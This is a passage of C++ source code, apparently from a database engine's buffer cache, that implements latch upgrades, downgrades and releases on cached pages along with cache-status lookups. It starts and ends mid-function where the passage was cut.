Assert( err >= JET_errSuccess ); // since page is updatable, maint impeding page won't fail.
if ( wrnBFLatchMaintConflict == err )
{
Assert( ( 0x1 & (DWORD_PTR)PBF( pbfl->dwContext ) ) == 0x0 ); // not hashed right
Assert( pbfPreMaint != PBF( pbfl->dwContext ) );
Assert( PBF( pbfl->dwContext )->sxwl.FOwnWriteLatch() );
err = ErrERRCheck( wrnBFBadLatchHint );
}
else
{
Assert( JET_errSuccess == err );
Assert( pbfPreMaint == PBF( pbfl->dwContext ) );
}
PBF( pbfl->dwContext )->rbsposSnapshot = rbsposSnapshot;
// ensure page is full sized for inserts
Assert( !fCachedNewPage ||
( PBF( pbfl->dwContext )->icbPage == PBF( pbfl->dwContext )->icbBuffer ) ||
( PBF( pbfl->dwContext )->bfdf == bfdfUntidy ) );
BFIRehydratePage( PBF( pbfl->dwContext ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), ifmp, pgno ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fCachedNewPage;
}
return err;
}
ERR ErrBFUpgradeReadLatchToRDWLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
ERR err;
PBF pbf;
CSXWLatch* psxwl;
CSXWLatch::ERR errSXWL;
// extract our BF and latch from the latch context
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// try to upgrade our shared latch to the exclusive latch
if ( psxwl == &pbf->sxwl )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch();
}
else
{
errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
psxwl->ReleaseSharedLatch();
pbfl->dwContext = DWORD_PTR( pbf );
}
}
// there was a latch conflict
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
// fail with a latch conflict
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// there was no latch conflict
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
// ensure that if the page is valid it is marked as valid. it is
// possible that we can't do this in the process of getting a Read
// Latch because we can't get the exclusive latch so we must make sure
// that we do it before we upgrade to a Write Latch or WAR Latch. the
// reason for this is that if we modify the page while it is still
// marked as not validated then another thread will misinterpret the
// page as invalid
//
// NOTE: it should be very rare that we will actually need to perform
// the full validation of this page. the reason we must do the full
// validation instead of just marking the page as validated is because
// the page may have been latched with bflfNoFaultFail in which case we
// do not know for sure if it was valid in the first place
(void)ErrBFIValidatePage( pbf, bfltExclusive, CPageValidationLogEvent::LOG_ALL, *TraceContextScope() );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
// we have the RDW Latch
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) );
// try to write a page before we touch it if it would impede the checkpoint
err = ErrBFIMaintImpedingPageLatch( pbf, fFalse, pbfl );
if ( err < JET_errSuccess )
{
// critical failure, loosen up on the latch ...
Expected( JET_errOutOfMemory == err || errBFLatchConflict == err );
Assert( pbf == PBF( pbfl->dwContext ) );
PBF( pbfl->dwContext )->sxwl.DowngradeExclusiveLatchToSharedLatch();
Call( err );
}
if ( wrnBFLatchMaintConflict == err )
{
Assert( ( 0x1 & (DWORD_PTR)PBF( pbfl->dwContext ) ) == 0x0 ); // not hashed right
Assert( pbf != PBF( pbfl->dwContext ) );
Assert( pbf->sxwl.FNotOwner() );
// Since we needed to change the context, it is safest to claim latch conflict.
PBF( pbfl->dwContext )->sxwl.DowngradeExclusiveLatchToSharedLatch();
Call( ErrERRCheck( errBFLatchConflict ) );
}
else
{
Assert( JET_errSuccess == err );
Assert( pbf == PBF( pbfl->dwContext ) );
}
Assert( FBFCurrentLatch( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFRDWLatched( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Expected( FBFUpdatableLatch( pbfl ) ); // because we could upgrade this to w-latch in place
}
else
{
Assert( FBFReadLatched( pbfl ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFUpgradeReadLatchToWARLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
ERR err;
PBF pbf;
CSXWLatch* psxwl;
CSXWLatch::ERR errSXWL;
// if we are mapping views then do not allow discretionary updates
if ( BoolParam( JET_paramEnableViewCache ) )
{
CallR( ErrERRCheck( errBFLatchConflict ) );
}
// extract our BF and latch from the latch context
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// try to upgrade our shared latch to the exclusive latch
if ( psxwl == &pbf->sxwl )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch();
}
else
{
errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
psxwl->ReleaseSharedLatch();
pbfl->dwContext = DWORD_PTR( pbf );
}
}
// there was a latch conflict
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
// fail with a latch conflict
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// there was no latch conflict
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
// unfortunately this page is being written, so there was an "effective" latch conflict
if ( !FBFIUpdatablePage( pbf ) )
{
Assert( pbf->err == wrnBFPageFlushPending );
if ( FBFICompleteFlushPage( pbf, bfltExclusive ) )
{
// completed the state transition associated with the write IO ...
Assert( FBFIUpdatablePage( pbf ) );
}
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... but since this function never really returned such
// before (assuming it was validated fully on relatch), we take the
// less risky approach of faking a latch conflict and let the buffer
// return the true error on the relatch path.
Assert( pbf->err != errBFIPageRemapNotReVerified );
if ( !FBFIUpdatablePage( pbf ) /* couldn't complete flush / still undergoing IO */ ||
pbf->err < JET_errSuccess /* remap failed read IO per above comment */ )
{
// Pre-latchless-IO we used to latch conflict if we were under Write IO as it
// was in x-latch, do the same here ...
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
}
// ensure that if the page is valid it is marked as valid. it is
// possible that we can't do this in the process of getting a Read
// Latch because we can't get the exclusive latch so we must make sure
// that we do it before we upgrade to a Write Latch or WAR Latch. the
// reason for this is that if we modify the page while it is still
// marked as not validated then another thread will misinterpret the
// page as invalid
//
// NOTE: it should be very rare that we will actually need to perform
// the full validation of this page. the reason we must do the full
// validation instead of just marking the page as validated is because
// the page may have been latched with bflfNoFaultFail in which case we
// do not know for sure if it was valid in the first place
(void)ErrBFIValidatePage( pbf, bfltExclusive, CPageValidationLogEvent::LOG_ALL, *TraceContextScope() );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
// mark this BF as WAR Latched
pbf->fWARLatch = fTrue;
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) );
err = JET_errSuccess;
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWARLatched( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
}
else
{
Assert( FBFReadLatched( pbfl ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFUpgradeReadLatchToWriteLatch( BFLatch* pbfl, const BOOL fCOWAllowed )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
ERR err;
PBF pbf;
CSXWLatch* psxwl;
CSXWLatch::ERR errSXWL;
RBS_POS rbsposSnapshot = rbsposMin;
// extract our BF and latch from the latch context
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// try to upgrade our shared latch to the write latch
if ( psxwl == &pbf->sxwl )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToWriteLatch();
}
else
{
errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
psxwl->ReleaseSharedLatch();
errSXWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
pbfl->dwContext = DWORD_PTR( pbf );
}
}
// there was a latch conflict
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
// fail with a latch conflict
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// there was no latch conflict
Assert( errSXWL == CSXWLatch::ERR::errSuccess ||
errSXWL == CSXWLatch::ERR::errWaitForWriteLatch );
// wait for ownership of the write latch if required
if ( errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then grab all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
if ( psxwlProc->ErrAcquireExclusiveLatch() == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForExclusiveLatch();
}
if ( psxwlProc->ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForWriteLatch();
}
}
}
#endif // MINIMAL_FUNCTIONALITY
// ensure that if the page is valid it is marked as valid. it is
// possible that we can't do this in the process of getting a Read
// Latch because we can't get the exclusive latch so we must make sure
// that we do it before we upgrade to a Write Latch or WAR Latch. the
// reason for this is that if we modify the page while it is still
// marked as not validated then another thread will misinterpret the
// page as invalid
//
// NOTE: it should be very rare that we will actually need to perform
// the full validation of this page. the reason we must do the full
// validation instead of just marking the page as validated is because
// the page may have been latched with bflfNoFaultFail in which case we
// do not know for sure if it was valid in the first place
(void)ErrBFIValidatePage( pbf, bfltWrite, CPageValidationLogEvent::LOG_ALL, *TraceContextScope() );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
if ( !fCOWAllowed && !FBFIUpdatablePage( PBF( pbfl->dwContext ) ) )
{
// we don't allow cows here ...
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
Call( ErrERRCheck( errBFLatchConflict ) );
}
// Capture the page pre-image if revert snapshot is configured (and the page is old enough)
err = ErrBFICapturePagePreimage( PBF( pbfl->dwContext ), &rbsposSnapshot );
if ( err < JET_errSuccess )
{
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
goto HandleError;
}
// try to write a page before we touch it if it would impede the checkpoint
err = ErrBFIMaintImpedingPageLatch( pbf, fTrue, pbfl );
if ( err < JET_errSuccess )
{
// critical failure, loosen up on the latch ...
Expected( JET_errOutOfMemory == err || JET_errOutOfBuffers == err || errBFLatchConflict == err );
Assert( pbf == PBF( pbfl->dwContext ) );
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
Call( err );
}
if ( wrnBFLatchMaintConflict == err )
{
Assert( ( 0x1 & (DWORD_PTR)PBF( pbfl->dwContext ) ) == 0x0 ); // not hashed right
Assert( pbf != PBF( pbfl->dwContext ) );
Assert( pbf->sxwl.FNotOwner() );
// Since we needed to change the context, it is safest to claim latch conflict.
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
Call( ErrERRCheck( errBFLatchConflict ) );
}
else
{
Assert( JET_errSuccess == err );
Assert( pbf == PBF( pbfl->dwContext ) );
}
PBF( pbfl->dwContext )->rbsposSnapshot = rbsposSnapshot;
// ensure page is full sized for inserts
BFIRehydratePage( PBF( pbfl->dwContext ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFReadLatched( pbfl ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFUpgradeRDWLatchToWARLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// ordinarily, I would disallow discretionary updates when mapping views
// by claiming a latch conflict. however, that is not possible here due
// to API convention. so, we will allow it to happen knowing that the
// change will almost certainly be thrown away and re-applied repeatedly
// // if we are mapping views then do not allow discretionary updates
//
// if ( BoolParam( JET_paramEnableViewCache ) )
// {
// CallR( ErrERRCheck( errBFLatchConflict ) );
// }
// mark this BF as WAR Latched
pbf->fWARLatch = fTrue;
// validate OUT args
Assert( FBFWARLatched( pbfl ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
// FYI, Not true ... interesting, FVERCheckUncommittedFreedSpace() runs on compressed page.
//Expected( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
// Since we guarantee this, we should change this function to BFUpgradeRDWLatchToWARLatch()
return JET_errSuccess;
}
ERR ErrBFUpgradeRDWLatchToWriteLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
ERR err = JET_errSuccess;
PBF pbf = PBF( pbfl->dwContext );
CSXWLatch::ERR errSXWL;
RBS_POS rbsposSnapshot = rbsposMin;
// upgrade our exclusive latch to the write latch
errSXWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess ||
errSXWL == CSXWLatch::ERR::errWaitForWriteLatch );
// wait for ownership of the write latch if required
if ( errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
// RDW already granted updatable latch, so this should be safe ...
Assert( FBFUpdatableLatch( pbfl ) );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then grab all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
if ( psxwlProc->ErrAcquireExclusiveLatch() == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForExclusiveLatch();
}
if ( psxwlProc->ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForWriteLatch();
}
}
}
#endif // MINIMAL_FUNCTIONALITY
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), PBF( pbfl->dwContext )->ifmp, PBF( pbfl->dwContext )->pgno ) );
// Capture the page pre-image if revert snapshot is configured (and the page is old enough)
err = ErrBFICapturePagePreimage( PBF( pbfl->dwContext ), &rbsposSnapshot );
if ( err < JET_errSuccess )
{
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToExclusiveLatch();
goto HandleError;
}
// try to write a page before we touch it if it would impede the checkpoint
// Note: This is the hardest case to move to an version copy scheme ...
BFIMaintImpedingPage( PBF( pbfl->dwContext ) );
PBF( pbfl->dwContext )->rbsposSnapshot = rbsposSnapshot;
// ensure page is full sized for inserts
BFIRehydratePage( PBF( pbfl->dwContext ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFRDWLatched( pbfl ) );
}
#endif
return err;
}
void BFDowngradeWriteLatchToRDWLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWriteLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then release all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
BFIValidatePagePgno( pbf );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// try to dehydrate page if possible
BFIDehydratePage( pbf, fFalse );
// downgrade our write latch to the exclusive latch
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
// validate OUT args
Assert( FBFRDWLatched( pbfl ) );
}
void BFDowngradeWARLatchToRDWLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// mark this BF as not WAR Latched
pbf->fWARLatch = fFalse;
// validate OUT args
Assert( FBFRDWLatched( pbfl ) );
}
void BFDowngradeWriteLatchToReadLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWriteLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then release all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
BFIValidatePagePgno( pbf );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// see if we want to opportunistically version this page to try to flush
PBF pbfOpportunisticCheckpointAdv = NULL;
BFIOpportunisticallyVersionPage( pbf, &pbfOpportunisticCheckpointAdv );
// generally speaking, we should not write unlatch clean pages.
Assert( pbf->bfdf != bfdfClean );
// try to dehydrate page if possible
BFIDehydratePage( pbf, fFalse );
// downgrade our write latch to a shared latch
pbf->sxwl.DowngradeWriteLatchToSharedLatch();
// attempt to flush the versioned page
if ( pbfOpportunisticCheckpointAdv )
{
BFIOpportunisticallyFlushPage( pbfOpportunisticCheckpointAdv, iorpBFCheckpointAdv );
}
// validate OUT args
Assert( FBFReadLatched( pbfl ) );
}
void BFDowngradeWARLatchToReadLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// mark this BF as not WAR Latched
pbf->fWARLatch = fFalse;
// see if we want to opportunistically version this page to try to flush
PBF pbfOpportunisticCheckpointAdv = NULL;
BFIOpportunisticallyVersionPage( pbf, &pbfOpportunisticCheckpointAdv );
// downgrade our exclusive latch to a shared latch
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
// attempt to flush the versioned page
if ( pbfOpportunisticCheckpointAdv )
{
BFIOpportunisticallyFlushPage( pbfOpportunisticCheckpointAdv, iorpBFCheckpointAdv );
}
// validate OUT args
Assert( FBFReadLatched( pbfl ) );
}
void BFDowngradeRDWLatchToReadLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// see if we want to opportunistically version this page to try to flush
PBF pbfOpportunisticCheckpointAdv = NULL;
BFIOpportunisticallyVersionPage( pbf, &pbfOpportunisticCheckpointAdv );
// downgrade our exclusive latch to a shared latch
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
// attempt to flush the versioned page
if ( pbfOpportunisticCheckpointAdv )
{
BFIOpportunisticallyFlushPage( pbfOpportunisticCheckpointAdv, iorpBFCheckpointAdv );
}
// validate OUT args
Assert( FBFReadLatched( pbfl ) );
}
void BFWriteUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWriteLatched( pbfl ) );
const PBF pbf = PBF( pbfl->dwContext );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then release all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// if the page is going to be written it should be a used page at this point
// if a page is write-latched with bflfNoFaultFail but not dirtied then it may
// still be corrupt at this point (a dirty page shouldn't be corrupt though).
if ( pbf->bfdf > bfdfClean )
{
BFIValidatePagePgno( pbf );
BFIValidatePageUsed( pbf );
}
// save for validation
const IFMP ifmp = pbf->ifmp;
const PGNO pgno = pbf->pgno;
Assert( pgno <= g_rgfmp[ ifmp ].PgnoLast() ||
g_rgfmp[ ifmp ].FBeyondPgnoShrinkTarget( pgno ) ||
g_rgfmp[ ifmp ].FOlderDemandExtendDb() );
BFIDehydratePage( pbf, fTrue );
// if this IFMP / PGNO is clean, simply release the write latch
if ( pbf->bfdf == bfdfClean )
{
pbf->sxwl.ReleaseWriteLatch();
}
else
{
// else release our write latch (with maintenance)
BFIUnlatchMaintPage( pbf, bfltWrite );
}
// validate OUT args
Assert( FBFNotLatched( ifmp, pgno ) );
}
void BFWARUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) );
// mark this BF as not WAR Latched
PBF( pbfl->dwContext )->fWARLatch = fFalse;
// release our exclusive latch
BFRDWUnlatch( pbfl );
}
void BFRDWUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
// if this IFMP / PGNO is clean, simply release the rdw latch
const PBF pbf = PBF( pbfl->dwContext );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// save for validation
const IFMP ifmp = pbf->ifmp;
const PGNO pgno = pbf->pgno;
if ( pbf->bfdf == bfdfClean )
{
pbf->sxwl.ReleaseExclusiveLatch();
}
else
{
// release our exclusive latch (with maintenance)
BFIUnlatchMaintPage( pbf, bfltExclusive );
}
// validate OUT args
Assert( FBFNotLatched( ifmp, pgno ) );
}
void BFReadUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
// extract our BF and latch from the latch context
PBF pbf;
CSXWLatch* psxwl;
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// save for validation
const IFMP ifmp = pbf->ifmp;
const PGNO pgno = pbf->pgno;
if ( pbf->bfdf != bfdfFilthy )
{
// if this IFMP / PGNO is not filthy, simply release the read latch
psxwl->ReleaseSharedLatch();
}
else
{
// release our shared latch (with maintenance)
BFIUnlatchMaintPage( pbf, bfltShared );
}
// validate OUT args
Assert( FBFNotLatched( ifmp, pgno ) );
}
void BFMarkAsSuperCold( IFMP ifmp, PGNO pgno, const BFLatchFlags bflf )
{
// this function makes a non-blocking attempt to push the page to the
// end (oldest) of the LRUK. We need at least an X latch.
// Don't care about tracing context because the page wouldn't be read from disk
// UNDONE: we don't currently use this in any code path where we care to trace this but we could in the future
TraceContextScope tcScope;
tcScope->nParentObjectClass = tceNone;
BFLatch bfl;
ERR err = ErrBFRDWLatchPage(
&bfl,
ifmp,
pgno,
BFLatchFlags( bflfNoTouch | bflfNoFaultFail | bflfUninitPageOk | bflfNoWait | bflfNoEventLogging | bflfNoUncached | bflf ),
BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 /* should not matter - NoUncached */ ),
*tcScope );
if ( err >= JET_errSuccess )
{
const ERR errBFLatchStatus = ErrBFLatchStatus( &bfl );
if( ( errBFLatchStatus >= JET_errSuccess ) || ( errBFLatchStatus == JET_errPageNotInitialized ) )
{
// if the error is patchable, we don't want to super-cold the page because
// there may be a patch request under way.
Expected( !PagePatching::FIsPatchableError( errBFLatchStatus ) );
BFMarkAsSuperCold( &bfl );
}
BFRDWUnlatch( &bfl );
}
}
void BFMarkAsSuperCold( BFLatch *pbfl )
{
Assert( FBFRDWLatched( pbfl ) || FBFWriteLatched( pbfl ) );
// extract our BF and latch from the latch context
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
BFIMarkAsSuperCold( pbf, fTrue );
}
void BFCacheStatus( const IFMP ifmp, const PGNO pgno, BOOL* const pfInCache, ERR* const perrBF, BFDirtyFlags* const pbfdf )
{
*pfInCache = fFalse;
( perrBF != NULL ) ? ( *perrBF = JET_errSuccess ) : 0;
( pbfdf != NULL ) ? ( *pbfdf = bfdfMin ) : 0;
if ( g_fBFCacheInitialized )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
if ( errHash == BFHash::ERR::errSuccess )
{
*pfInCache = fTrue;
( perrBF != NULL ) ? ( *perrBF = pgnopbf.pbf->err ) : 0;
( pbfdf != NULL ) ? ( *pbfdf = (BFDirtyFlags)pgnopbf.pbf->bfdf ) : 0;
}
g_bfhash.ReadUnlockKey( &lock );
}
}
BOOL FBFInCache( IFMP ifmp, PGNO pgno )
{
BOOL fInCache = fFalse;
BFCacheStatus( ifmp, pgno, &fInCache );
return fInCache;
}
// determines if a given page was previously in the cache ... this allows
// someone to know if a page was recently pulled into the cache. this is designed
// to be called after a BFPreread API but before the acquiring the latch. if you
// acquire the latch, it will start returning true (even if your pre-read caused
// the page to be cached).
BOOL FBFPreviouslyCached( IFMP ifmp, PGNO pgno )
{
BOOL fInCache = fFalse;
ERR errBF = JET_errSuccess;
BFCacheStatus( ifmp, pgno, &fInCache, &errBF );
return ( fInCache && // must have been in cache already
( errBF != errBFIPageFaultPending ) && // and page NOT currently being read in
